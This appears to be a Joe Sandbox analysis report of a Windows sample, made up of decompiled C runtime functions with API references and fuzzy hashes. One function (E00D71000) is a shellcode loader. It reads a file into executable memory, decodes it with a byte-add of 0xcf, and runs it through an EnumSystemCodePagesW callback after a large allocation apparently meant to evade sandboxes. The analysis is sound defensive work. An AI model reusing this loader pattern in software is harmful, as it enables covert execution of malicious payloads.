                        				void* _t141;
                        				signed int _t142;
                        				signed int _t143;
                        				void** _t147;
                        				signed int _t149;
                        				void* _t150;
                        				void** _t154;
                        				void* _t155;
                        				void* _t156;
                        
                        				_push(0x64);
                        				_push(0xd82260);
                        				E00D72400(__ebx, __edi, __esi);
                        				E00D7442F(0xb);
                        				 *(_t155 - 4) = 0;
                        				_push(0x40);
                        				_t141 = 0x20;
                        				_push(_t141);
                        				_t82 = E00D74869();
                        				_t133 = _t82;
                        				 *(_t155 - 0x24) = _t133;
                        				if(_t133 != 0) {
                        					 *0xd84848 = _t82;
                        					 *0xd850e4 = _t141;
                        					while(_t133 <  &(_t82[0x200])) {
                        						_t133[1] = 0xa00;
                        						 *_t133 =  *_t133 | 0xffffffff;
                        						_t133[2] = 0;
                        						_t133[9] = _t133[9] & 0x00000080;
                        						_t133[9] = _t133[9] & 0x0000007f;
                        						_t133[9] = 0xa0a;
                        						_t133[0xe] = 0;
                        						_t133[0xd] = 0;
                        						_t133 =  &(_t133[0x10]);
                        						 *(_t155 - 0x24) = _t133;
                        						_t82 =  *0xd84848; // 0x0
                        					}
                        					GetStartupInfoW(_t155 - 0x74);
                        					if( *((short*)(_t155 - 0x42)) == 0) {
                        						L27:
                        						_t129 = 0xfffffffe;
                        						L28:
                        						_t142 = 0;
                        						while(1) {
                        							 *(_t155 - 0x2c) = _t142;
                        							if(_t142 >= 3) {
                        								break;
                        							}
                        							_t147 =  *0xd84848 + (_t142 << 6);
                        							 *(_t155 - 0x24) = _t147;
                        							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
                        								_t147[1] = 0x81;
                        								if(_t142 != 0) {
                        									_t65 = _t142 - 1; // -1
                        									asm("sbb eax, eax");
                        									_t90 =  ~_t65 + 0xfffffff5;
                        								} else {
                        									_t90 = 0xfffffff6;
                        								}
                        								_t91 = GetStdHandle(_t90);
                        								 *(_t155 - 0x1c) = _t91;
                        								if(_t91 == 0xffffffff || _t91 == 0) {
                        									L45:
                        									_t147[1] = _t147[1] | 0x00000040;
                        									 *_t147 = _t129;
                        									_t94 =  *0xd86100;
                        									if(_t94 != 0) {
                        										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
                        									}
                        									goto L47;
                        								} else {
                        									_t98 = GetFileType(_t91);
                        									if(_t98 == 0) {
                        										goto L45;
                        									}
                        									 *_t147 =  *(_t155 - 0x1c);
                        									_t99 = _t98 & 0x000000ff;
                        									if(_t99 != 2) {
                        										if(_t99 != 3) {
                        											L44:
                        											_t71 =  &(_t147[3]); // -14174268
                        											E00D740A2(_t71, 0xfa0, 0);
                        											_t156 = _t156 + 0xc;
                        											_t147[2] = _t147[2] + 1;
                        											goto L47;
                        										}
                        										_t103 = _t147[1] | 0x00000008;
                        										L43:
                        										_t147[1] = _t103;
                        										goto L44;
                        									}
                        									_t103 = _t147[1] | 0x00000040;
                        									goto L43;
                        								}
                        							} else {
                        								_t147[1] = _t147[1] | 0x00000080;
                        								L47:
                        								_t142 = _t142 + 1;
                        								continue;
                        							}
                        						}
                        						 *(_t155 - 4) = _t129;
                        						E00D73B53();
                        						_t86 = 0;
                        						L49:
                        						return E00D72445(_t86);
                        					}
                        					_t105 =  *(_t155 - 0x40);
                        					if(_t105 == 0) {
                        						goto L27;
                        					}
                        					_t135 =  *_t105;
                        					 *(_t155 - 0x1c) = _t135;
                        					_t106 =  &(_t105[1]);
                        					 *(_t155 - 0x28) = _t106;
                        					 *(_t155 - 0x20) = _t106 + _t135;
                        					if(_t135 >= 0x800) {
                        						_t135 = 0x800;
                        						 *(_t155 - 0x1c) = 0x800;
                        					}
                        					_t149 = 1;
                        					 *(_t155 - 0x30) = 1;
                        					while( *0xd850e4 < _t135) {
                        						_t138 = E00D74869(_t141, 0x40);
                        						 *(_t155 - 0x24) = _t138;
                        						if(_t138 != 0) {
                        							0xd84848[_t149] = _t138;
                        							 *0xd850e4 =  *0xd850e4 + _t141;
                        							while(_t138 <  &(0xd84848[_t149][0x200])) {
                        								_t138[1] = 0xa00;
                        								 *_t138 =  *_t138 | 0xffffffff;
                        								_t138[2] = 0;
                        								_t138[9] = _t138[9] & 0x00000080;
                        								_t138[9] = 0xa0a;
                        								_t138[0xe] = 0;
                        								_t138[0xd] = 0;
                        								_t138 =  &(_t138[0x10]);
                        								 *(_t155 - 0x24) = _t138;
                        							}
                        							_t149 = _t149 + 1;
                        							 *(_t155 - 0x30) = _t149;
                        							_t135 =  *(_t155 - 0x1c);
                        							continue;
                        						}
                        						_t135 =  *0xd850e4;
                        						 *(_t155 - 0x1c) = _t135;
                        						break;
                        					}
                        					_t143 = 0;
                        					 *(_t155 - 0x2c) = 0;
                        					_t129 = 0xfffffffe;
                        					_t109 =  *(_t155 - 0x28);
                        					_t139 =  *(_t155 - 0x20);
                        					while(_t143 < _t135) {
                        						_t150 =  *_t139;
                        						if(_t150 == 0xffffffff || _t150 == _t129) {
                        							L22:
                        							_t143 = _t143 + 1;
                        							 *(_t155 - 0x2c) = _t143;
                        							_t109 =  &(( *(_t155 - 0x28))[0]);
                        							 *(_t155 - 0x28) = _t109;
                        							_t139 =  &(_t139[1]);
                        							 *(_t155 - 0x20) = _t139;
                        							continue;
                        						} else {
                        							_t111 =  *_t109;
                        							if((_t111 & 0x00000001) == 0) {
                        								goto L22;
                        							}
                        							if((_t111 & 0x00000008) != 0) {
                        								L20:
                        								_t154 = 0xd84848[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
                        								 *(_t155 - 0x24) = _t154;
                        								 *_t154 =  *_t139;
                        								_t154[1] =  *( *(_t155 - 0x28));
                        								_t37 =  &(_t154[3]); // 0xd
                        								E00D740A2(_t37, 0xfa0, 0);
                        								_t156 = _t156 + 0xc;
                        								_t154[2] = _t154[2] + 1;
                        								_t139 =  *(_t155 - 0x20);
                        								L21:
                        								_t135 =  *(_t155 - 0x1c);
                        								goto L22;
                        							}
                        							_t119 = GetFileType(_t150);
                        							_t139 =  *(_t155 - 0x20);
                        							if(_t119 == 0) {
                        								goto L21;
                        							}
                        							goto L20;
                        						}
                        					}
                        					goto L28;
                        				}
                        				_t86 = E00D72600(_t155, 0xd83400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
                        				goto L49;
                        			}































                        APIs
                        • __lock.LIBCMT ref: 00D738B6
                          • Part of subcall function 00D7442F: __mtinitlocknum.LIBCMT ref: 00D74441
                          • Part of subcall function 00D7442F: EnterCriticalSection.KERNEL32(00000000,?,00D737AB,0000000D), ref: 00D7445A
                        • __calloc_crt.LIBCMT ref: 00D738C7
                          • Part of subcall function 00D74869: __calloc_impl.LIBCMT ref: 00D74878
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D738E2
                        • GetStartupInfoW.KERNEL32(?,00D82260,00000064,00D71654,00D82190,00000014), ref: 00D7393B
                        • __calloc_crt.LIBCMT ref: 00D73986
                        • GetFileType.KERNEL32(00000001), ref: 00D739CF
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: __calloc_crt$CallCriticalEnterFileFilterFunc@8InfoSectionStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2772871689-0
                        • Opcode ID: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction ID: 3b9319270afad973bf9a4d6e91ec7af8224983e9556176e32cd70dba36fc4022
                        • Opcode Fuzzy Hash: eedce8d412bb233e26a2a556420ff0ae670e97df73ef385219ec3b4d94f6f218
                        • Instruction Fuzzy Hash: FD81B2719043458FDB14CF68C8416A9BBF0EF19324B28826ED4AAEB391E734D942DB74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E00D73815(void* __ebx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				void* _t3;
                        				intOrPtr _t6;
                        				long _t14;
                        				long* _t27;
                        
                        				E00D71890(_t3);
                        				if(E00D74560() != 0) {
                        					_t6 = E00D74001(E00D735A6);
                        					 *0xd8350c = _t6;
                        					__eflags = _t6 - 0xffffffff;
                        					if(_t6 == 0xffffffff) {
                        						goto L1;
                        					} else {
                        						_t27 = E00D74869(1, 0x3bc);
                        						__eflags = _t27;
                        						if(_t27 == 0) {
                        							L6:
                        							E00D7388B();
                        							__eflags = 0;
                        							return 0;
                        						} else {
                        							__eflags = E00D7405D( *0xd8350c, _t27);
                        							if(__eflags == 0) {
                        								goto L6;
                        							} else {
                        								_push(0);
                        								_push(_t27);
                        								E00D73762(__ebx, __edi, _t27, __eflags);
                        								_t14 = GetCurrentThreadId();
                        								_t27[1] = _t27[1] | 0xffffffff;
                        								 *_t27 = _t14;
                        								__eflags = 1;
                        								return 1;
                        							}
                        						}
                        					}
                        				} else {
                        					L1:
                        					E00D7388B();
                        					return 0;
                        				}
                        			}









                        APIs
                        • __init_pointers.LIBCMT ref: 00D73815
                          • Part of subcall function 00D71890: EncodePointer.KERNEL32(00000000,?,00D7381A,00D7163A,00D82190,00000014), ref: 00D71893
                          • Part of subcall function 00D71890: __initp_misc_winsig.LIBCMT ref: 00D718AE
                          • Part of subcall function 00D71890: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D74117
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D7412B
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D7413E
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D74151
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D74164
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D74177
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00D7418A
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D7419D
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D741B0
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D741C3
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D741D6
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D741E9
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D741FC
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D7420F
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D74222
                          • Part of subcall function 00D71890: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D74235
                        • __mtinitlocks.LIBCMT ref: 00D7381A
                        • __mtterm.LIBCMT ref: 00D73823
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D7447A
                          • Part of subcall function 00D7388B: _free.LIBCMT ref: 00D74481
                          • Part of subcall function 00D7388B: DeleteCriticalSection.KERNEL32(00D83558,?,?,00D73828,00D7163A,00D82190,00000014), ref: 00D744A3
                        • __calloc_crt.LIBCMT ref: 00D73848
                        • __initptd.LIBCMT ref: 00D7386A
                        • GetCurrentThreadId.KERNEL32 ref: 00D73871
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                        • String ID:
                        • API String ID: 3567560977-0
                        • Opcode ID: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction ID: 162fec928960f12b415d3688e2dbec891a10202e2c4c5d94db79b42cea7b531f
                        • Opcode Fuzzy Hash: 278c1f0dd0e93df5de4385ab4f058799a2bc60290f049d1f0ed56eec90eb9c6f
                        • Instruction Fuzzy Hash: B9F096325193215EE32977787C1368A2A84CF01B30B24C76DF46CD81D2FF218A4156B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E00D712B0(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                        				char* _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				void* __ebx;
                        				void* __esi;
                        				signed int _t74;
                        				signed int _t78;
                        				char _t81;
                        				signed int _t86;
                        				signed int _t88;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t97;
                        				signed int _t98;
                        				char* _t99;
                        				signed int _t100;
                        				signed int _t102;
                        				signed int _t103;
                        				signed int _t104;
                        				char* _t110;
                        				signed int _t113;
                        				signed int _t117;
                        				signed int _t119;
                        				void* _t120;
                        
                        				_t99 = _a4;
                        				_t74 = _a8;
                        				_v8 = _t99;
                        				_v12 = _t74;
                        				if(_a12 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t97 = _a16;
                        				if(_t97 == 0) {
                        					goto L5;
                        				}
                        				if(_t99 != 0) {
                        					_t119 = _a20;
                        					__eflags = _t119;
                        					if(_t119 == 0) {
                        						L9:
                        						__eflags = _a8 - 0xffffffff;
                        						if(_a8 != 0xffffffff) {
                        							_t74 = E00D71530(_t99, 0, _a8);
                        							_t120 = _t120 + 0xc;
                        						}
                        						__eflags = _t119;
                        						if(_t119 == 0) {
                        							goto L3;
                        						} else {
                        							_t78 = _t74 | 0xffffffff;
                        							__eflags = _t97 - _t78 / _a12;
                        							if(_t97 > _t78 / _a12) {
                        								goto L3;
                        							}
                        							L13:
                        							_t117 = _a12 * _t97;
                        							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        							_t98 = _t117;
                        							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        								_t100 = 0x1000;
                        							} else {
                        								_t100 =  *(_t119 + 0x18);
                        							}
                        							_v16 = _t100;
                        							__eflags = _t117;
                        							if(_t117 == 0) {
                        								L41:
                        								return _a16;
                        							} else {
                        								do {
                        									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                        									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                        										L24:
                        										__eflags = _t98 - _t100;
                        										if(_t98 < _t100) {
                        											_t81 = E00D72752(_t98, _t119, _t119);
                        											__eflags = _t81 - 0xffffffff;
                        											if(_t81 == 0xffffffff) {
                        												L46:
                        												return (_t117 - _t98) / _a12;
                        											}
                        											_t102 = _v12;
                        											__eflags = _t102;
                        											if(_t102 == 0) {
                        												L42:
                        												__eflags = _a8 - 0xffffffff;
                        												if(_a8 != 0xffffffff) {
                        													E00D71530(_a4, 0, _a8);
                        												}
                        												 *((intOrPtr*)(E00D71CC3())) = 0x22;
                        												L4:
                        												E00D71E89();
                        												goto L5;
                        											}
                        											_t110 = _v8;
                        											 *_t110 = _t81;
                        											_t98 = _t98 - 1;
                        											_v8 = _t110 + 1;
                        											_t103 = _t102 - 1;
                        											__eflags = _t103;
                        											_v12 = _t103;
                        											_t100 =  *(_t119 + 0x18);
                        											_v16 = _t100;
                        											goto L40;
                        										}
                        										__eflags = _t100;
                        										if(_t100 == 0) {
                        											_t86 = 0x7fffffff;
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t86 = _t98;
                        											}
                        										} else {
                        											__eflags = _t98 - 0x7fffffff;
                        											if(_t98 <= 0x7fffffff) {
                        												_t44 = _t98 % _t100;
                        												__eflags = _t44;
                        												_t113 = _t44;
                        												_t91 = _t98;
                        											} else {
                        												_t113 = 0x7fffffff % _t100;
                        												_t91 = 0x7fffffff;
                        											}
                        											_t86 = _t91 - _t113;
                        										}
                        										__eflags = _t86 - _v12;
                        										if(_t86 > _v12) {
                        											goto L42;
                        										} else {
                        											_push(_t86);
                        											_push(_v8);
                        											_push(E00D72873(_t119));
                        											_t88 = E00D72A2A();
                        											_t120 = _t120 + 0xc;
                        											__eflags = _t88;
                        											if(_t88 == 0) {
                        												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                        												goto L46;
                        											}
                        											__eflags = _t88 - 0xffffffff;
                        											if(_t88 == 0xffffffff) {
                        												L45:
                        												_t64 = _t119 + 0xc;
                        												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                        												__eflags =  *_t64;
                        												goto L46;
                        											}
                        											_t98 = _t98 - _t88;
                        											__eflags = _t98;
                        											L36:
                        											_v8 = _v8 + _t88;
                        											_v12 = _v12 - _t88;
                        											_t100 = _v16;
                        											goto L40;
                        										}
                        									}
                        									_t94 =  *(_t119 + 4);
                        									_v20 = _t94;
                        									__eflags = _t94;
                        									if(__eflags == 0) {
                        										goto L24;
                        									}
                        									if(__eflags < 0) {
                        										goto L45;
                        									}
                        									__eflags = _t98 - _t94;
                        									if(_t98 < _t94) {
                        										_t94 = _t98;
                        										_v20 = _t98;
                        									}
                        									_t104 = _v12;
                        									__eflags = _t94 - _t104;
                        									if(_t94 > _t104) {
                        										goto L42;
                        									} else {
                        										E00D72897(_v8, _t104,  *_t119, _t94);
                        										_t88 = _v20;
                        										_t120 = _t120 + 0x10;
                        										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                        										_t98 = _t98 - _t88;
                        										 *_t119 =  *_t119 + _t88;
                        										goto L36;
                        									}
                        									L40:
                        									__eflags = _t98;
                        								} while (_t98 != 0);
                        								goto L41;
                        							}
                        						}
                        					}
                        					_t74 = (_t74 | 0xffffffff) / _a12;
                        					__eflags = _t97 - _t74;
                        					if(_t97 <= _t74) {
                        						goto L13;
                        					}
                        					goto L9;
                        				}
                        				L3:
                        				 *((intOrPtr*)(E00D71CC3())) = 0x16;
                        				goto L4;
                        			}





























                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction ID: 7100eee9444e1edd4926910414a3c15ba6e0780f65ec087109f216d529f89e78
                        • Opcode Fuzzy Hash: a4e72c1444eba6eca6272083a5f87d55c4e3d997e8b7cd9676b1c48892554378
                        • Instruction Fuzzy Hash: C751CE38A006059BDB248FAD88856AEB7B1AF41324F28C729F87D966D1F770DD508B74
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E00D77452(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                        				void* _t7;
                        				void* _t8;
                        				intOrPtr* _t9;
                        				intOrPtr* _t12;
                        				void* _t20;
                        				long _t31;
                        
                        				if(_a4 != 0) {
                        					_t31 = _a8;
                        					if(_t31 != 0) {
                        						_push(__ebx);
                        						while(_t31 <= 0xffffffe0) {
                        							if(_t31 == 0) {
                        								_t31 = _t31 + 1;
                        							}
                        							_t7 = HeapReAlloc( *0xd84834, 0, _a4, _t31);
                        							_t20 = _t7;
                        							if(_t20 != 0) {
                        								L17:
                        								_t8 = _t20;
                        							} else {
                        								if( *0xd84830 == _t7) {
                        									_t9 = E00D71CC3();
                        									 *_t9 = E00D71CD6(GetLastError());
                        									goto L17;
                        								} else {
                        									if(E00D71741(_t7, _t31) == 0) {
                        										_t12 = E00D71CC3();
                        										 *_t12 = E00D71CD6(GetLastError());
                        										L12:
                        										_t8 = 0;
                        									} else {
                        										continue;
                        									}
                        								}
                        							}
                        							goto L14;
                        						}
                        						E00D71741(_t6, _t31);
                        						 *((intOrPtr*)(E00D71CC3())) = 0xc;
                        						goto L12;
                        					} else {
                        						E00D74831(_a4);
                        						_t8 = 0;
                        					}
                        					L14:
                        					return _t8;
                        				} else {
                        					return E00D7113F(__ebx, __edx, __edi, _a8);
                        				}
                        			}










                        APIs
                        • _malloc.LIBCMT ref: 00D7745E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                        • _free.LIBCMT ref: 00D77471
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: AllocHeap_free_malloc
                        • String ID:
                        • API String ID: 2734353464-0
                        • Opcode ID: 2e6bcde8ddb9d40707659fd4a2eaa78ee7d69ad48a4c9393baf89f4664d54936
                        • Instruction ID: c5849b6f846d88d016a79cef9a64116457cb18d21cf60a451bec5e216a458715
                        • Opcode Fuzzy Hash: 2e6bcde8ddb9d40707659fd4a2eaa78ee7d69ad48a4c9393baf89f4664d54936
                        • Instruction Fuzzy Hash: 52117731909625ABCB213FB8AC456597FD4EF04368B24CE2AF94CDA351FA70884086B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E00D71000(void* __ecx, void* __eflags, intOrPtr _a12) {
                        				intOrPtr _v8;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t6;
                        				void* _t7;
                        				void* _t14;
                        				_Unknown_base(*)()* _t15;
                        				void* _t20;
                        				void* _t21;
                        				void* _t22;
                        				intOrPtr* _t28;
                        
                        				_push(_t14);
                        				_t22 = 0;
                        				_t6 = E00D7113F(_t14, _t20, 0, 0x17d78400);
                        				 *_t28 = 0xd83000;
                        				_v8 = _t6;
                        				_t7 = E00D711D1(_a12, _t21);
                        				_t15 = VirtualAlloc(0, 0x137a, 0x3000, 0x40);
                        				E00D71475(_t15, 0x137a, 1, _t7);
                        				_t10 = _v8;
                        				if(_v8 != 0) {
                        					E00D71530(_t10, 0xcb, 0x17d78400);
                        					do {
                        						 *((char*)(_t15 + _t22)) =  *((char*)(_t15 + _t22)) + 0xcf;
                        						_t22 = _t22 + 1;
                        					} while (_t22 < 0x137a);
                        					EnumSystemCodePagesW(_t15, 0);
                        				}
                        				return 0;
                        			}















                        APIs
                        • _malloc.LIBCMT ref: 00D7100E
                          • Part of subcall function 00D7113F: __FF_MSGBANNER.LIBCMT ref: 00D71156
                          • Part of subcall function 00D7113F: __NMSG_WRITE.LIBCMT ref: 00D7115D
                          • Part of subcall function 00D7113F: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00D748C7,00000000,00000000,00000000,00000000,?,00D744F9,00000018,00D82280), ref: 00D71182
                          • Part of subcall function 00D711D1: __wfsopen.LIBCMT ref: 00D711DC
                        • VirtualAlloc.KERNEL32(00000000,0000137A,00003000,00000040), ref: 00D71036
                        • __fread_nolock.LIBCMT ref: 00D71048
                        • _memset.LIBCMT ref: 00D71062
                        • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00D71076
                        Memory Dump Source
                        • Source File: 00000002.00000002.322119059.0000000000D71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D70000, based on PE: true
                        • Associated: 00000002.00000002.322111839.0000000000D70000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322141442.0000000000D83000.00000008.00000001.01000000.00000004.sdmp
                        • Associated: 00000002.00000002.322149061.0000000000D87000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_d70000_aeokw.jbxd
                        Similarity
                        • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                        • String ID:
                        • API String ID: 612201108-0
                        • Opcode ID: e4038f276a8dd2edc6c7140be0fba1f327a39625a4b6c3948c5fb9ac37111e0d
                        • Instruction ID: c49b18dd87d4ba4bac98c936af6f26b7ddc41a12926152908871bb55bd3dbe6c
                        • Opcode Fuzzy Hash: e4038f276a8dd2edc6c7140be0fba1f327a39625a4b6c3948c5fb9ac37111e0d
                        • Instruction Fuzzy Hash: 730128B6A043047BE7202B799C4BF9F7F5CDB41768F104A51FA09AB1C2FAF499418274
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00D791C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				intOrPtr _v12;
                        				int _v20;
                        				int _t35;
                        				int _t38;
                        				int _t42;
                        				intOrPtr* _t44;
                        				int _t47;
                        				short* _t49;
                        				intOrPtr _t50;
                        				intOrPtr _t54;
                        				int _t55;
                        				int _t59;
                        				char* _t62;
                        
                        				_t62 = _a8;
                        				if(_t62 == 0) {
                        					L5:
                        					return 0;
                        				}
                        				_t50 = _a12;
                        				if(_t50 == 0) {
                        					goto L5;
                        				}
                        				if( *_t62 != 0) {
                        					E00D74BFC( &_v20, _a16);
                        					_t35 = _v20;
                        					__eflags =  *(_t35 + 0xa8);
                        					if( *(_t35 + 0xa8) != 0) {
                        						_t38 = E00D7917B( *_t62 & 0x000000ff,  &_v20);
                        						__eflags = _t38;
                        						if(_t38 == 0) {
                        							__eflags = _a4;
                        							_t59 = 1;
                        							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                        							__eflags = _t42;
                        							if(_t42 != 0) {
                        								L21:
                        								__eflags = _v8;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									_t31 = _t54 + 0x70;
                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                        									__eflags =  *_t31;
                        								}
                        								return _t59;
                        							}
                        							L20:
                        							_t44 = E00D71CC3();
                        							_t59 = _t59 | 0xffffffff;
                        							__eflags = _t59;
                        							 *_t44 = 0x2a;
                        							goto L21;
                        						}
                        						_t59 = _v20;
                        						__eflags =  *(_t59 + 0x74) - 1;
                        						if( *(_t59 + 0x74) <= 1) {
                        							L15:
                        							__eflags = _t50 -  *(_t59 + 0x74);
                        							L16:
                        							if(__eflags < 0) {
                        								goto L20;
                        							}
                        							__eflags = _t62[1];
                        							if(_t62[1] == 0) {
                        								goto L20;
                        							}
                        							L18:
                        							_t59 =  *(_t59 + 0x74);
                        							goto L21;
                        						}
                        						__eflags = _t50 -  *(_t59 + 0x74);
                        						if(__eflags < 0) {
                        							goto L16;
                        						}
                        						__eflags = _a4;
                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                        						_t59 = _v20;
                        						__eflags = _t47;
                        						if(_t47 != 0) {
                        							goto L18;
                        						}
                        						goto L15;
                        					}
                        					_t55 = _a4;
                        					__eflags = _t55;
                        					if(_t55 != 0) {
                        						 *_t55 =  *_t62 & 0x000000ff;
                        					}
                        					_t59 = 1;
                        					goto L21;
                        				}
                        				_t49 = _a4;
                        				if(_t49 != 0) {
                        					 *_t49 = 0;
                        				}
                        				goto L5;
                        			}


















                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D791FC
                        • __isleadbyte_l.LIBCMT ref: 00D7922A
                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 00D79258
